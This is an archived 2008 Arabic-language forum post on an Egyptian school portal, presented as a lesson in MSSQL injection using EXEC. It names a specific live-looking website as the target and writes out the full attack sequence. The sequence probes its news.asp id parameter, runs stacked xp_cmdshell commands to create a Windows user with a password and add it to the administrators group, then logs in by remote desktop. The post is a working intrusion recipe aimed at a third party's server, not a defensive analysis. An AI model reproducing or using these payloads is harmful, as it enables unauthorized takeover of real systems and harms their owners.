اهلا وسهلا بك فى بوابة الثانوية العامة ... سجل الان

العودة   بوابة الثانوية العامة المصرية > القسم الإداري > أرشيف المنتدى

أرشيف المنتدى هنا نقل الموضوعات المكررة والروابط التى لا تعمل

 
 
أدوات الموضوع ابحث في الموضوع انواع عرض الموضوع
  #1  
قديم 15-03-2008, 09:29 AM
muslim4ever1 muslim4ever1 غير متواجد حالياً
عضو جديد
 
تاريخ التسجيل: Mar 2008
المشاركات: 6
معدل تقييم المستوى: 0
muslim4ever1 is on a distinguished road
افتراضي using EXEC in mssql injection

سلام عليكم شباب

انهرده هنعمل موضوع جميل عن استخدام داله exec فى sql injection انا كنت عايز اعمل الدرس من زمان بس للاسف مكنتش لاقى سيرفر بيدعم الداله دى لانها اصلا بتجيى مش ديفلت مش مفعله و اللى بيفعلها الادمن لى سببين يا اما انو غبى و مش بيفهم دى بتعمل ايه او انو بيستخدمها فى حاجه معينه عموما هيا خطر جدا على السيرفر علشان كده قليل انك تلاقيها مفعله و انا عامل الدرس ده علشان الناس اللى مش بتحب الsql injection بى حجه انها مش بتطبق اوامر

و الدرس ده هيبقا شرح لى درس http://www.milw0rm.com/video/watch.php?id=70

الموقع المصاب

www.chestergas.com

و المتغير و الملف هما

www.chestergas.com/news.asp?id=1

احنا هنكتشف الثغره بى الريقه العاديه لانها مش blind و بالتالى هتطلع الايرور العادى بتعنا

www.chestergas.com/news.asp?id=1'a



طيب اوك كده يبقا احنا شغالين تمام بس مش هنسخدم الطريقه العاديه و نطلع باقى العدد انما هنقفل الامر ده بى ; و نخش على الامر الجديد بتاعنا اللى هوا exec و دلوقتى هنضيف يوزر فى السيرفر

www.chestergas.com/news.asp?id=1; exec master..xp_cmdshell 'net user valentino 123456 /add' ;--



اوك مفيش ايرور يبقا الامر اشتغل تمام و نحط اليوزر بالمره فى الادمنز

www.chestergas.com/news.asp?id=1; exec master..xp_cmdshell 'net localgroup administartor valentino /add' ;--
[
تمام كده معاك روت على السيرفر و اتصل بى ريموت ديسك توب و عيش عموما اوامر الexec كتتتتتتتتتتتتتتتتييييييييير اوى و انا كنت مجمع جزء كبير منها فى موضوع فى جورس بس مقفول دلوقتى لما يفتح هبقا اعدل الموضوع و اكتبها و اى حد مش فاهم حاجه يقولى
انا لقيت صعوبه فى انى احط الدرس فى الموقع و ده مش اول درس يرفضو المود سيكيورتى ياريت حد من المشرفين يشوف ايه الاكواد الممنوعه عندى و يعدل الموضوع و يحطو
 

العلامات المرجعية


ضوابط المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا يمكنك اضافة مرفقات
لا يمكنك تعديل مشاركاتك

BB code متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع


جميع الأوقات بتوقيت GMT +2. الساعة الآن 05:31 AM.